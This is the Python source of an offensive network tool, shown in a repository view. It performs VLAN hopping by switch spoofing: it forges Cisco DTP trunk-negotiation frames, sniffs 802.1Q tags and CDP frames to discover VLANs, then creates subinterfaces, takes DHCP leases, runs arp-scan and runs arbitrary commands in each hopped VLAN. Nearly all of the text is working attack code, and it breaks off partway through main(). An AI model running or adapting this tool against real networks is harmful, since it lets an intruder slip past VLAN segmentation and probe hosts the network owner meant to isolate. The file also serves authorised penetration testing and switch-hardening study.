mgeeky-Penetration-Testing-.../networks/VLANHopperDTP.py

846 lines
26 KiB
Python
Raw Normal View History

2018-02-02 22:22:43 +01:00
#!/usr/bin/python
#
# This script performs DTP Trunk mode detection and a VLAN Hopping
# attack automatically, then runs a sniffer to discover any other
# VLANs available.
#
# To be launched only in a Unix/Linux environment, as the script utilizes
# the following applications:
#   - 8021q.ko
#   - vconfig
#   - ifconfig / ip / route
#   - dhclient
#   - (optional) arp-scan
#
# Python requirements:
#   - scapy
#
# NOTICE:
#   This program uses code written by 'floodlight', which comes from here:
#       https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
#   - Add logic that falls back to static IP address setup when DHCP fails
#   - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
#   - Add automatic packet capture via tshark/tcpdump to a specified output directory
#   - Add functionality to automatically scan the desired network via arp-scan
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
#
import os
import re
2018-02-02 22:22:43 +01:00
import sys
import socket
import struct
import textwrap
2018-02-02 22:22:43 +01:00
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
# Release number printed in the startup banner.
VERSION = '0.4'

# Run-time settings shared by every function in this script. parseOptions()
# overwrites the option-driven entries; main() fills in 'macaddr', 'inet'
# and 'origmacaddr'.
config = dict(
    verbose=False,
    debug=False,
    force=False,
    count=10,
    timeout=90,
    analyse=False,
    interface='',
    macaddr='',
    inet='',
    origmacaddr='',
    commands=[],
    exitcommands=[],
)

# Set by main() when the `arp-scan` binary is found.
arpScanAvailable = False

# Flags shared between the worker threads.
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False

# Results and bookkeeping collected while the script runs.
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = dict()
subinterfaces = set()
cdpsCollected = set()
tempfiles = list()
#
# ===============================================
# Floodlight's afpacket definitions
#
# Constants consumed by the AF_PACKET helpers below.
ETH_P_8021Q = 0x8100            # TPID that recv() packs in front of the VLAN TCI
SOL_PACKET = 263                # socket option level used by enable_auxdata()
PACKET_AUXDATA = 8              # option / control-message type checked in recv()
TP_STATUS_VLAN_VALID = 0x10     # bit 4 of tpacket_auxdata.tp_status
class struct_iovec(Structure):
    """Buffer descriptor that recv() points at the packet buffer given to recvmsg()."""

    _fields_ = [
        ("iov_base", c_void_p),     # start of the buffer
        ("iov_len", c_size_t),      # size of the buffer in bytes
    ]
class struct_msghdr(Structure):
    """Message header that recv() fills in and passes by reference to recvmsg()."""

    _fields_ = [
        ("msg_name", c_void_p),                 # left as None by recv()
        ("msg_namelen", c_uint32),
        ("msg_iov", POINTER(struct_iovec)),     # data buffer descriptor(s)
        ("msg_iovlen", c_size_t),
        ("msg_control", c_void_p),              # control (ancillary) buffer
        ("msg_controllen", c_size_t),
        ("msg_flags", c_int),
    ]
class struct_cmsghdr(Structure):
    """Header found at the start of the control buffer returned by recvmsg()."""

    _fields_ = [
        ("cmsg_len", c_size_t),
        ("cmsg_level", c_int),      # recv() expects SOL_PACKET here
        ("cmsg_type", c_int),       # recv() expects PACKET_AUXDATA here
    ]
class struct_tpacket_auxdata(Structure):
    """Auxiliary packet data that recv() reads right after the control header."""

    _fields_ = [
        ("tp_status", c_uint),          # tested against TP_STATUS_VLAN_VALID
        ("tp_len", c_uint),
        ("tp_snaplen", c_uint),
        ("tp_mac", c_ushort),
        ("tp_net", c_ushort),
        ("tp_vlan_tci", c_ushort),      # VLAN TCI re-inserted into the frame
        ("tp_padding", c_ushort),
    ]
# Bind libc's recvmsg() directly: recv() needs the control (ancillary) data
# of each message, which is where the VLAN tag is delivered.
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
# ctypes reads the return type from `restype` (any other attribute name is
# silently ignored); recvmsg() returns a ssize_t.
recvmsg.restype = c_ssize_t
def enable_auxdata(sk):
    """
    Turn on PACKET_AUXDATA for the given socket so that the kernel returns
    the VLAN tag in a control message.

    Must be called on the socket before recv() is used on it.
    """
    level, option, enabled = SOL_PACKET, PACKET_AUXDATA, 1
    sk.setsockopt(level, option, enabled)
def recv(sk, bufsize):
    """
    Receive a packet from an AF_PACKET socket, re-inserting its VLAN tag.

    enable_auxdata() must have been called on the socket beforehand, since
    the tag is read from the PACKET_AUXDATA control message.

    @sk Socket
    @bufsize Maximum packet size

    Returns the raw frame. When the auxiliary data carries a VLAN TCI (or
    flags it as valid), a 4-byte 802.1Q tag is inserted after the first 12
    bytes of the frame.

    Raises RuntimeError when recvmsg() fails, AssertionError when the
    control message is not the expected PACKET_AUXDATA one.
    """
    buf = create_string_buffer(bufsize)

    ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
    ctrl_buf = create_string_buffer(ctrl_bufsize)

    iov = struct_iovec()
    iov.iov_base = cast(buf, c_void_p)
    iov.iov_len = bufsize

    msghdr = struct_msghdr()
    msghdr.msg_name = None
    msghdr.msg_namelen = 0
    msghdr.msg_iov = pointer(iov)
    msghdr.msg_iovlen = 1
    msghdr.msg_control = cast(ctrl_buf, c_void_p)
    msghdr.msg_controllen = ctrl_bufsize
    msghdr.msg_flags = 0

    rv = recvmsg(sk.fileno(), byref(msghdr), 0)
    if rv < 0:
        # Interpolate the value; passing it as a second argument would leave
        # the "%d" placeholder unformatted in the exception message.
        raise RuntimeError("recvmsg failed: rv=%d" % rv)

    # The kernel only delivers control messages we ask for. We
    # only enabled PACKET_AUXDATA, so we can assume it's the
    # only control message.
    assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)

    cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
    assert cmsghdr.cmsg_level == SOL_PACKET
    assert cmsghdr.cmsg_type == PACKET_AUXDATA

    auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101

    # `.raw` copies the whole buffer on every access, so take it once.
    data = buf.raw
    if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
        # Insert VLAN tag
        tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
        return data[:12] + tag + data[12:rv]
    return data[:rv]
#
# ===============================================
#
class Logger:
    """Console output helpers gated by config['verbose'] and config['debug']."""

    @staticmethod
    def _out(x):
        # Regular messages are shown in verbose or debug mode only.
        if not (config['debug'] or config['verbose']):
            return
        sys.stdout.write(x + '\n')

    @staticmethod
    def dbg(x):
        # Debug messages require debug mode.
        if not config['debug']:
            return
        sys.stdout.write('[dbg] ' + x + '\n')

    @staticmethod
    def out(x):
        Logger._out('[.] ' + x)

    @staticmethod
    def info(x):
        Logger._out('[?] ' + x)

    @staticmethod
    def err(x):
        # Errors are written regardless of the verbosity settings.
        sys.stdout.write('[!] ' + x + '\n')

    @staticmethod
    def fail(x):
        Logger._out('[-] ' + x)

    @staticmethod
    def ok(x):
        Logger._out('[+] ' + x)
def inspectPacket(dtp):
    """
    Decode the status TLV of a captured DTP frame and report whether the
    switch port looks open to trunk negotiation.

    dtp -- scapy packet carrying a DTP layer.

    Returns True when the reported status is one for which VLAN Hopping is
    (or may be) possible; False for access mode, for a frame without a
    status TLV, and for an unrecognised status value.
    """
    stat = -1
    for tlv in dtp['DTP'].tlvlist:
        # TLV type 2 is the one whose `status` byte is decoded here.
        if tlv.type == 2:
            stat = ord(tlv.status)
            break

    ret = True
    if stat == -1:
        Logger.fail('Something went wrong: Got invalid DTP packet.')
        ret = False

    elif stat == 2:
        Logger.fail('DTP disabled, Switchport in Access mode configuration')
        print('[!] VLAN Hopping is not possible.')
        ret = False

    elif stat == 3:
        Logger.ok('DTP enabled, Switchport in default configuration')
        print('[+] VLAN Hopping is possible.')

    elif stat == 4 or stat == 0x84:
        Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
        print('[+] VLAN Hopping is possible.')

    elif stat == 0x83:
        Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
        print('[+] VLAN Hopping is possible.')

    elif stat == 0x81:
        Logger.ok('DTP enabled, Switchport in Trunk configuration')
        print('[+] VLAN Hopping IS possible.')

    elif stat == 0xa5:
        Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
        print('[?] VLAN Hopping may be possible.')

    elif stat == 0x42:
        Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
        print('[?] VLAN Hopping may be possible.')

    else:
        Logger.info('Unknown DTP packet.')
        # show() prints the dissection and returns None, which Logger.dbg()
        # cannot concatenate; dump=True returns the text instead, so it is
        # only displayed in debug mode.
        Logger.dbg(dtp.show(dump = True))
        ret = False

    if ret:
        print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')

    return ret
def floodTrunkingRequests():
    """
    Keep sending crafted DTP frames on config['interface'] until
    `stopThreads` is set, pausing a third of config['timeout'] between
    frames. Intended to run in its own thread.
    """
    while not stopThreads:
        # Ethernet
        dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)

        # Logical-Link Control
        llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)

        # OUT = Cisco, Code = DTP
        snap = SNAP(OUI = 0x0c, code = 0x2004)

        # DTP, Status = Access/Desirable (3), Type: Trunk (3)
        # The TLV values are raw bytes: the declared lengths (13 and 5)
        # leave room for a 9-byte domain and 1-byte status/type values, so
        # the escapes must be real byte escapes, not literal backslashes.
        dtp = DTP(ver = 1, tlvlist = [
            DTPDomain(length = 13, type = 1, domain = '\x00\x00\x00\x00\x00\x00\x00\x00\x00'),
            DTPStatus(status = '\x03', length = 5, type = 2),
            DTPType(length = 5, type = 3, dtptype = '\xa5'),
            DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
        ])

        frame = dot3 / llc / snap / dtp

        Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
        # NOTE(review): scapy's send() works at layer 3, while this frame
        # starts at layer 2 (Dot3); sendp() is the usual call for such
        # frames - confirm on a live switch before changing.
        send(frame, iface = config['interface'], verbose = False)

        time.sleep(config['timeout'] / 3)
def engageDot1qSniffer():
    """
    Listen on config['interface'] for 802.1Q-tagged frames and record every
    VLAN ID not seen before in `vlansDiscovered`.

    Unless analysis mode is on, an addVlanIface() thread is started for each
    newly discovered VLAN. Only the first call does any work; later calls
    return immediately. The loop runs until `stopThreads` is set.
    """
    global dot1qSnifferStarted

    if dot1qSnifferStarted:
        return

    dot1qSnifferStarted = True

    #Logger.info('Started VLAN/802.1Q sniffer.')

    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    try:
        sock.bind((config['interface'], ETH_P_ALL))
        enable_auxdata(sock)

        print('[>] Discovering new VLANs...')

        while not stopThreads:
            buf = recv(sock, 65535)
            pkt = Ether(buf)

            if not pkt.haslayer(Dot1Q):
                continue

            dot1q = pkt.vlan
            if dot1q in vlansDiscovered:
                continue

            print('==> VLAN discovered: {}'.format(dot1q))
            vlansDiscovered.add(dot1q)

            if not config['analyse']:
                t = threading.Thread(target = addVlanIface, args = (dot1q, ))
                t.daemon = True
                t.start()
            else:
                Logger.info('Analysis mode: Did not go any further.')
    finally:
        # Release the raw socket even when bind()/recv() raises.
        sock.close()

    Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
    """
    Decide whether to start the attack based on the captured frames.

    dtps -- iterable of sniffed scapy packets; only those with a DTP layer
            are inspected.

    When a DTP frame passes inspectPacket(), or when config['force'] is set,
    one floodTrunkingRequests() thread is started and `attackEngaged` is
    raised. Once the attack is engaged, the 802.1Q sniffer is run in the
    calling thread.
    """
    global attackEngaged

    if stopThreads:
        return

    if not attackEngaged:
        # Stops at the first frame that inspectPacket() accepts.
        negotiable = any(
            dtp.haslayer(DTP) and inspectPacket(dtp) for dtp in dtps
        )

        if negotiable:
            #Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
            Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
        elif config['force']:
            Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
            Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')

        # Start the flooding thread once only: forcing must not add a second
        # flooder when detection has already started one.
        if negotiable or config['force']:
            t = threading.Thread(target = floodTrunkingRequests)
            t.daemon = True
            t.start()

            attackEngaged = True
            time.sleep(5)

    if attackEngaged:
        engageDot1qSniffer()
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
    """
    Expand the placeholders in `cmd` for subinterface `subif` and run it.

    Placeholders: %IFACE (subinterface), %HWADDR (MAC), %IP (address),
    %NET (network), %MASK (full mask), %GW (gateway), %CIDR (short mask,
    expanded with a leading '/').

    forceOut -- print the command output between dotted rulers instead of
                passing it to Logger.info().
    noCmd    -- do not print the 'Launching command' line.
    """
    Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))

    routes = "route -n | grep " + subif

    # Each value is resolved lazily, only if its placeholder is present.
    placeholders = (
        ('%IFACE', lambda: subif),
        ('%HWADDR', lambda: getHwAddr(subif)),
        ('%IP', lambda: getIfaceIP(subif)),
        ('%NET', lambda: shell(routes + " | grep -v UG | awk '{print $1}' | head -1")),
        ('%MASK', lambda: shell(routes + " | grep -v UG | awk '{print $3}' | head -1")),
        ('%GW', lambda: shell(routes + " | grep UG | awk '{print $2}' | head -1")),
        ('%CIDR', lambda: '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")),
    )
    for token, resolve in placeholders:
        if token in cmd:
            cmd = cmd.replace(token, resolve())

    cmd = cmd.strip()

    if not noCmd:
        print('[>] Launching command: "{}"'.format(cmd))
    out = shell(cmd)

    if not forceOut:
        Logger.info(out)
        return

    print('\n' + '.' * 50)
    print(out)
    print('.' * 50 + '\n')
def launchCommands(subif, commands, forceOut = False, noCmd = False):
    """Run launchCommand() for every entry of `commands`, in order."""
    for entry in commands:
        launchCommand(subif, entry, forceOut, noCmd)
def addVlanIface(vlan):
    """
    Create the VLAN subinterface '<interface>.<vlan>' and try to obtain a
    DHCP lease on it (two attempts).

    On success the VLAN is recorded in `vlansHopped` / `vlansLeases`, the
    user commands from config['commands'] are run and, when arp-scan is
    available, the hopped subnet is scanned. Failures are only logged.
    """
    global subinterfaces
    global vlansLeases
    global tempfiles

    subif = '{}.{}'.format(config['interface'], vlan)

    if subif in subinterfaces:
        Logger.fail('Already created that subinterface: {}'.format(subif))
        return

    Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))

    out = shell('vconfig add {} {}'.format(
        config['interface'], vlan
    ))

    if not out.startswith('Added VLAN with VID == {}'.format(vlan)):
        Logger.fail('Failed.: "{}"'.format(out))
        return

    subinterfaces.add(subif)

    # mkstemp() creates the files securely and leaves them on disk, so the
    # paths handed to dhclient stay reserved and cleanup() always finds
    # something to remove.
    pidFd, pidFile = tempfile.mkstemp()
    os.close(pidFd)
    dbFd, dbFile = tempfile.mkstemp()
    os.close(dbFd)

    tempfiles.append(pidFile)
    tempfiles.append(dbFile)

    Logger.dbg('So far so good, subinterface {} added.'.format(subif))

    ret = False
    for attempt in range(2):
        Logger.dbg('Acquiring DHCP lease for {}'.format(subif))

        shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
        time.sleep(3)

        if attempt > 0:
            shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
            time.sleep(3)

        shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))

        time.sleep(3)
        ip = getIfaceIP(subif)

        if ip:
            Logger.dbg('Subinterface obtained IP: {}'.format(ip))
            ret = True
            vlansHopped.add(vlan)
            vlansLeases[vlan] = (
                ip,
                shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
                shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
            )

            print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
                vlan,
                vlansLeases[vlan][0],
                vlansLeases[vlan][1],
                vlansLeases[vlan][2]
            ))

            launchCommands(subif, config['commands'])

            if arpScanAvailable:
                Logger.info('ARP Scanning connected subnet.')
                print('[>] Other hosts in hopped subnet: ')
                launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
            break

        Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
            subif
        ))

        time.sleep(5)

    if not ret:
        Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
def addVlansFromCdp(vlans):
    """
    Wait until the attack is engaged, then start one addVlanIface() thread
    per VLAN in `vlans` and record each VLAN in `vlansDiscovered`.

    Returns early, without hopping, when `stopThreads` is raised while
    waiting.
    """
    # Poll every 3 seconds for the attack to begin.
    while True:
        if attackEngaged:
            break
        time.sleep(3)
        if stopThreads:
            return

    for vlan in vlans:
        Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
            vlan
        ))
        worker = threading.Thread(target=addVlanIface, args=(vlan,))
        worker.daemon = True
        worker.start()
        vlansDiscovered.add(vlan)
def processCdp(pkt):
    """
    Summarise the TLVs of a CDP frame and, for a device summary not seen
    before, print it and schedule hopping to the VLANs it advertises.

    Frames that are not Dot3 frames addressed to 01:00:0c:cc:cc:cc, or that
    have no `msg` attribute, are ignored. In analysis mode nothing is
    scheduled.
    """
    global cdpsCollected
    global vlansDiscovered

    addressedToCisco = Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc'
    if not addressedToCisco:
        return

    if not hasattr(pkt, 'msg'):
        return

    # TLV type -> label used in the printed summary.
    tlvs = {
        1: 'Device Hostname',
        2: 'Addresses',
        3: 'Port ID',
        4: 'Capabilities',
        5: 'Software Version',
        6: 'Software Platform',
        9: 'VTP Management Domain',
        10:'Native VLAN',
        14:'VoIP VLAN',
        22:'Management Address',
    }

    # Capability names indexed by bit position in the `cap` field.
    capabilityNames = (
        "Router",
        "TransparentBridge",
        "SourceRouteBridge",
        "Switch",
        "Host",
        "IGMPCapable",
        "Repeater",
    )

    vlans = set()
    lines = []

    for tlv in pkt.msg:
        if tlv.type not in tlvs:
            continue

        key = ' {}:'.format(tlvs[tlv.type]).ljust(25)

        fmt = ''
        if hasattr(tlv, 'val'):
            fmt = tlv.val
        elif hasattr(tlv, 'iface'):
            fmt = tlv.iface
        elif hasattr(tlv, 'cap'):
            fmt = '+'.join(
                name for bit, name in enumerate(capabilityNames)
                if tlv.cap & (1 << bit) != 0
            )
        elif hasattr(tlv, 'vlan'):
            fmt = str(tlv.vlan)
            vlans.add(tlv.vlan)
        elif hasattr(tlv, 'addr'):
            fmt = ''.join(
                '{}, '.format(tlv.addr[i].addr) for i in range(tlv.naddr)
            )

        wrapper = textwrap.TextWrapper(
            initial_indent = key,
            width = 80,
            subsequent_indent = ' ' * len(key)
        )
        lines.append('{}\n'.format(wrapper.fill(fmt)))

    # Collapse runs of newlines into single ones.
    out = re.sub(r'(?:\n)+', '\n', ''.join(lines))

    if out in cdpsCollected:
        return

    cdpsCollected.add(out)
    print('\n[+] Discovered new CDP aware device:\n{}'.format(out))

    if config['analyse']:
        Logger.info('Analysis mode: Did not go any further.')
    else:
        worker = threading.Thread(target=addVlansFromCdp, args=(vlans,))
        worker.daemon = True
        worker.start()
def packetCallback(pkt):
    """Per-packet sniff() callback: log the packet and hand Cisco-multicast Dot3 frames to processCdp()."""
    Logger.dbg('RECV: ' + pkt.summary())

    if Dot3 not in pkt:
        return
    if pkt.dst != '01:00:0c:cc:cc:cc':
        return

    processCdp(pkt)
def sniffThread():
    """
    Capture CDP/DTP frames on config['interface'] until the attack is
    engaged or `stopThreads` is set.

    Every captured packet goes through packetCallback(); each capture round
    ends after config['count'] packets, config['timeout'] seconds, or the
    first DTP frame. When DTP frames were captured (or config['force'] is
    set) they are handed to processDtps() in a new thread.
    """
    global vlansDiscovered

    warnOnce = False

    Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
        config['count'], config['timeout']
    ))

    while not stopThreads and not attackEngaged:
        captured = []
        try:
            captured = sniff(
                count = config['count'],
                filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
                timeout = config['timeout'],
                prn = packetCallback,
                stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
                iface = config['interface']
            )
        except Exception as e:
            if 'Network is down' in str(e):
                break
            Logger.err('Exception occured during sniffing: ' + str(e))

        # The capture filter also lets CDP frames through; keep only real
        # DTP frames so the count and the warning below are accurate.
        dtps = [pkt for pkt in captured if pkt.haslayer(DTP)]

        if not dtps and not warnOnce:
            Logger.fail('It seems like there was no DTP frames transmitted.')
            Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
            Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
            Logger.info('\tSWITCH(config-if)# switchport mode access\n')
            warnOnce = True

        if dtps or config['force']:
            if dtps:
                Logger.dbg('Got {} DTP frames.\n'.format(
                    len(dtps)
                ))
            else:
                Logger.info('Forced mode: Beginning attack blindly.')

            t = threading.Thread(target = processDtps, args = (dtps, ))
            t.daemon = True
            t.start()

    Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
    """
    Return the hardware (MAC) address of `ifname` as lowercase
    'xx:xx:xx:xx:xx:xx'.

    Only the first 15 characters of the name are passed to the kernel.
    Raises IOError/OSError when the ioctl fails (e.g. unknown interface).
    """
    name = ifname[:15]
    if not isinstance(name, bytes):
        # struct.pack('256s', ...) needs a byte string.
        name = name.encode('ascii')

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # 0x8927 is SIOCGIFHWADDR on Linux.
        info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', name))
    finally:
        # The socket is only a handle for the ioctl; do not leak it.
        s.close()

    # bytearray() yields integers on both Python 2 and Python 3.
    return ':'.join('%02x' % octet for octet in bytearray(info[18:24]))
def getIfaceIP(iface):
    """Return the first 'inet' address reported by `ip addr show` for `iface`, without the prefix length (empty string when there is none)."""
    pipeline = ' | '.join((
        "ip addr show " + iface,
        "grep 'inet '",
        "awk '{print $2}'",
        "head -1",
        "cut -d/ -f1",
    ))
    address = shell(pipeline)
    Logger.dbg('Interface: {} has IP: {}'.format(iface, address))
    return address
def changeMacAddress(iface, mac):
    """
    Set the MAC address of `iface` to `mac` using ifconfig (the interface is
    taken down and brought back up).

    Returns True when the interface's address changed, or when it already
    equals the requested one; False otherwise.
    """
    old = getHwAddr(iface)
    print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
        iface, old, mac
    ))
    shell('ifconfig {} down'.format(iface))
    shell('ifconfig {} hw ether {}'.format(iface, mac))
    shell('ifconfig {} up'.format(iface))

    current = getHwAddr(iface)
    # Requesting the address the interface already has is not a failure.
    ret = current != old or current.lower() == mac.strip().lower()
    if ret:
        Logger.dbg('Changed.')
    else:
        Logger.dbg('Not changed.')
    return ret
def assure8021qCapabilities():
    """
    Check that the '8021q' kernel module and the 'vconfig' utility are
    available, then load the module.

    Returns True when both are present, False (after logging an error)
    otherwise.
    """
    dryRun = shell('modprobe -n 8021q')
    if 'not found' in dryRun:
        Logger.err('There is no kernel module named: "8021q". Fatal error.')
        return False

    vconfigPath = shell('which vconfig')
    if len(vconfigPath) == 0:
        Logger.err('There is no "vconfig" utility. Package required: "vconfig". Fatal error.')
        return False

    shell('modprobe 8021q')
    return True
def shell(cmd):
    """Run `cmd` through commands.getstatusoutput() and return its output; the exit status is discarded."""
    _status, output = commands.getstatusoutput(cmd)
    Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, output))
    return output
def selectDefaultInterface():
    """
    Detect the interface of the default route and store it in
    config['interface'].

    The `ip` based lookup is tried first, the `route` based one second.
    Returns the interface name, or '' when none could be determined.
    """
    global config

    lookups = (
        "ip route show | grep default | awk '{print $5}' | head -1",
        "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
    )

    for lookup in lookups:
        out = shell(lookup).strip()

        # shell() returns whatever the pipeline printed, which for a missing
        # tool is an error message; an interface name is a single token, so
        # anything containing whitespace is rejected.
        if out and len(out.split()) == 1:
            Logger.info('Default interface lookup command returned:\n{}'.format(out))
            config['interface'] = out
            return out

    return ''
def cleanup():
    """
    Undo the changes made while running: restore the original MAC address
    if it was changed, run the exit commands on and remove every created
    subinterface, and delete the temporary files.
    """
    if config['origmacaddr'] != config['macaddr']:
        Logger.dbg('Restoring original MAC address...')
        changeMacAddress(config['interface'], config['origmacaddr'])

    # Iterate over a snapshot: worker threads may still add subinterfaces.
    for subif in list(subinterfaces):
        Logger.dbg('Removing subinterface: {}'.format(subif))
        launchCommands(subif, config['exitcommands'])
        shell('vconfig rem {}'.format(subif))

    Logger.dbg('Removing temporary files...')
    for path in list(tempfiles):
        try:
            os.remove(path)
        except OSError as e:
            # A file that is already gone must not abort the cleanup.
            Logger.dbg('Could not remove temporary file {}: {}'.format(path, e))
def parseOptions(argv):
    """
    Print the banner, parse the command line and store the result in
    `config`.

    argv -- full argument vector: argv[0] is the program name, the rest are
            the options to parse.

    Returns the argparse namespace. With --force, config['timeout'] is
    lowered to 30 seconds.
    """
    print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
    parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
    parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
    #parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
    parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
    parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')

    # Parse the vector that was passed in rather than implicitly reading
    # sys.argv, so the `argv` parameter is honoured.
    args = parser.parse_args(argv[1:])

    config['verbose'] = args.verbose
    config['debug'] = args.debug
    config['analyse'] = args.analyse
    config['force'] = args.force
    config['interface'] = args.interface
    config['commands'] = args.command
    config['exitcommands'] = args.exitcommand

    if args.force:
        config['timeout'] = 30

    return args
def printStats():
    """Print the final report: VLANs hopped to (with leases), VLANs discovered and CDP devices seen."""
    print('\n' + '-' * 80)
    print('\tSTATISTICS\n')

    print('[VLANS HOPPED]')
    if not vlansHopped:
        print('Did not hop into any VLAN.')
    else:
        print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
            len(vlansHopped)
        ))
        for vlan, (ip, network, cidr) in vlansLeases.items():
            print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, ip, network, cidr))

    print('\n[VLANS DISCOVERED]')
    if not vlansDiscovered:
        print('No VLANs discovered.')
    else:
        print('Discovered following VLANs ({}):'.format(
            len(vlansDiscovered)
        ))
        for vlan in vlansDiscovered:
            print('- VLAN {}'.format(vlan))

    print('\n[CDP DEVICES]')
    if not cdpsCollected:
        print('No CDP aware devices discovered.')
    else:
        print('Discovered following CDP aware devices ({}):'.format(
            len(cdpsCollected)
        ))
        for dev in cdpsCollected:
            print(dev + '\n')
def main(argv):
    """
    Program entry point: validate the environment, start the sniffing
    thread and wait for Ctrl+C, then clean up and print the statistics.

    argv -- full argument vector (program name first).

    Returns False when a prerequisite is missing (root, 8021q support,
    usable interface, MAC change), True after a completed run.
    """
    global config
    global stopThreads
    global arpScanAvailable

    opts = parseOptions(argv)
    if not opts:
        Logger.err('Options parsing failed.')
        return False

    if os.getuid() != 0:
        Logger.err('This program must be run as root.')
        return False

    load_contrib('dtp')
    load_contrib('cdp')

    if not assure8021qCapabilities():
        Logger.err('Unable to proceed.')
        return False

    if not opts.interface:
        if not selectDefaultInterface():
            Logger.err('Could not find suitable interface. Please specify it.')
            return False

    print('[>] Interface to work on: "{}"'.format(config['interface']))

    # The ioctl behind getHwAddr() raises for an unknown interface; report
    # that through the regular error path instead of a traceback.
    try:
        hwaddr = getHwAddr(config['interface'])
    except (IOError, OSError):
        hwaddr = ''

    config['origmacaddr'] = config['macaddr'] = hwaddr
    if not config['macaddr']:
        Logger.err('Could not acquire MAC address of interface: "{}"'.format(
            config['interface']
        ))
        return False
    else:
        Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
            config['interface'], config['macaddr']
        ))

    config['inet'] = getIfaceIP(config['interface'])
    if not config['inet']:
        Logger.fail('Could not acquire interface\'s IP address! Proceeding...')

    if opts.mac:
        if changeMacAddress(config['interface'], opts.mac):
            config['macaddr'] = opts.mac
        else:
            Logger.err('Could not change interface\'s MAC address!')
            return False

